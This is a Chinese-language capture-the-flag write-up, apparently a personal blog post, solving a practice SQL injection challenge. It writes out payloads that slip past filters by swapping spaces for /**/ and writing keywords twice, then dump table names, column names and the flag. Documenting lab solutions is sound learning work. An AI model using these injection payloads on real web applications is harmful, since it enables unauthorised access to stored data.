CTF练习解析

实验吧web-简单的sql注入

2019-03-12  本文已影响3人  追求科技的足球

想着ctf是必须要学的了,自己是个菜鸡,还是多学一点。看到了实验吧平台,第一天,就从sql注入开始学起吧。

简单的sql注入,用了sqlmap没有成功(刚知道这个工具第一次尝试就失败了QAQ),看来直接从网上破解吧。

第一个想法就是先试一下初始的1,竟然有反应,没想到。

有一个坑是这个可以过滤空格,因此空格可以使用/**/代替或者输两遍单词,如果单纯输入1‘union select database()'是会报错的,因此输入1' /**/union/**/select/**/database()'

看到了数据库名,接下来看数据库中的表名,使用1' /**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

果然出现了一大堆表,其中有一个flag表,对其进行查询,绕不过去了。。。双写也不行,看见网上一种写法是1' unionunion selectselect column_namcolumn_namee fromfrom information_schema.coluinformation_schema.columnsmns wherewhere table_name='flag(太神奇了我也不知道双写空格还双写英文混乱字母)

查到了字段名,可以查值了,使用1' /**/union/**/select/**/flag/**/from/**/flag/**/where'1'='1

结束。

接上,sqlmap来破解,见sqlmap用法 - 简书中的第一个。

上一篇 下一篇

猜你喜欢

热点阅读